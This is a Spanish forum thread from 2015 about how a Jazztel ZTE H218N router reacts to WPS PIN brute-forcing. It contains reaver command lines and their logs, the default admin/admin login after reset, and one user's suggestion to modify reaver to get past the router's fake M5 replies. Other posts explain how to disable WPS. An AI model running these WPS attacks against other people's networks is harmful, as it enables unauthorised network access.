Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
¿Perdiste tu email de activación?
21-11-2017, 16:53 (Martes)
Inicio Ayuda Reglas Buscar Ingresar Registrarse
Noticias:
Liberada wifislax64-1.1 version final para descargar

Videos Downloader




+  Seguridad Wireless - Wifi
|-+  Desarrollo de scripts y aplicaciones
| |-+  Desarrollo, Comunicados y noticias
| | |-+  Router ZTE H218N Fibra Jazztel
0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Router ZTE H218N Fibra Jazztel  (Leído 72323 veces)
warcry
Visitante
« : 03-02-2015, 23:03 (Martes) »

Bueno, comentar que he abandonado ono ya que eso es un coladero y tiene mas fallos de seguridad que la leche  Grin Grin Grin

Bien, pues esta semana pasada me han colocado el router este, lo primero es que viene con wps activado, pero digamos que con un sistema de protección un tanto curioso

cuando lanzas reaver, el primer pin que prueba XXXX-0000 le responde al m5 ok, eso que significa, pues que reaver entiende que la secuencia inicial es la correcta y pasa a bloquearla y probar la segunda parte XXXX-0001 XXXX-0002 etc.

pero el pin correcto no se encuentra entre esa secuencia, bueno la verdad es que no se cual es el pin correcto porque no lo he visto por ningún lado, unos dicen que salta con 12345670 pero en mi caso no.

y da igual que pin pruebes con la opcion -p, por ejemplo -p 1111 o -p 2222 ,etc, siempre te bloquea la primera secuencia porque con cualquier pin contesta afirmativamente al m5.

pues nada, que por si las moscas voy a desactivar el wps, y no te da la opcion por ningun lado, ya que el unico submenu en el que pone wps pone solo activar pbc.

Indagando por internet, encontré la solución un tanto rara pero efectiva, y es deshabilitarle el interface titular wifi (ssid1) y para tener wifi activar uno virtual (ssid2)

os dejo un vídeo de como se hace.

<a href="http://www.youtube.com/watch?v=gTq6bYNG2l8" target="_blank">http://www.youtube.com/watch?v=gTq6bYNG2l8</a>

por cierto para poder meterle mano al router tendreis que resetearlo ya que el instalador le mete su propia clave la cual no te la da, una vez reseteado es admin/admin  Grin
« Última modificación: 03-02-2015, 23:09 (Martes) por warcry » En línea
USUARIONUEVO
Colaborador
*
Desconectado Desconectado

Mensajes: 13781



Ver Perfil
« Respuesta #1 : 03-02-2015, 23:13 (Martes) »

¿usaste el argumento -n en las pruebas con reaver?

yo estoy esperando a que pongan la fibra ,para pasar los 20 megas a fibre 200/200 , de momento solo han puesto torpeto los de movistar , pero ya se recogieron en enero las firmas para los permisos de jazztel.

a ver si llega pronto , aunque despues de puestos, tardan un par de meses o asi en tenerlo operativo.
En línea

warcry
Visitante
« Respuesta #2 : 03-02-2015, 23:19 (Martes) »

nop

pero he editado el post, la contestacion al m5 lo hace con cualquier secuencia que pruebes, y a bully le pasa lo mismo

yo ya tengo 200/200  Grin
En línea
warcry
Visitante
« Respuesta #3 : 03-02-2015, 23:31 (Martes) »

acabo de probar con el -n y la unica diferencia es que no pasa de pin,


Código:
wifiway ~ # reaver -i mon0 -b EC:8editado -n -vv

Reaver v1.4-r119 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from EC:8editado
[+] Switching mon0 to channel 1
[+] Associated with EC:8editado (ESSID: pru)
Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
^C
[+] Nothing done, nothing to save.
wifiway ~ # reaver -i mon0 -b EC:8editado -n -p 0000 -vv

Reaver v1.4-r119 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from EC:8editado
[+] Switching mon0 to channel 1
[+] Associated with EC:8editado (ESSID: pru)
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
^C
[+] Nothing done, nothing to save.
wifiway ~ #
En línea
vk496
*******
Desconectado Desconectado

Mensajes: 2192



Ver Perfil WWW
« Respuesta #4 : 03-02-2015, 23:58 (Martes) »

Un tanto curioso... Han aplicado la seguridad desde otra perspectiva... En vez de bloquear intentos, te dice que si a todo xD

He entendido bien?

Salu2
En línea
uri92
**
Desconectado Desconectado

Mensajes: 2


Ver Perfil
« Respuesta #5 : 11-02-2015, 12:49 (Mi?rcoles) »

Si te sirve de algo, cuando vaya al trabajo te doy el SSID que tenemos puesto (el por defecto) y el pin que tenemos, a ver si así se puede sacar un patrón entre varios
En línea
lima23
**
Desconectado Desconectado

Mensajes: 10


Ver Perfil
« Respuesta #6 : 31-07-2015, 09:34 (Viernes) »

Eso pasa con todas las nuevas JAZZTEL_XXXX con letras mayúsculas y minúsculas pero sin formato hexadecimal que ya hay muchísimas. Se quedan en M6 todos los intentos de PIN.

Ejemplo: JAZZTEL_BrSz

Si nos fijamos, tras enviar el M6 se recibe por 2ª vez el M5, por lo que quizás pueda distingurse cuando el router falsea y cuando se aciertan los 4 primeros dígitos del PIN que en este caso tras enviar el M6 no se recibiría el M5 de nuevo.

Habría que modificar el "programita" para que tras recibir el 2º M5 pase al siguiente PIN y no se quede probando siempre el mismo.

¿Qué pensáis?

Código:
Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
« Última modificación: 31-07-2015, 23:11 (Viernes) por lima23 » En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios
Si continúa navegando consideramos que acepta su uso. OK Más información | Y más
Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines
SMFAds for Free Forums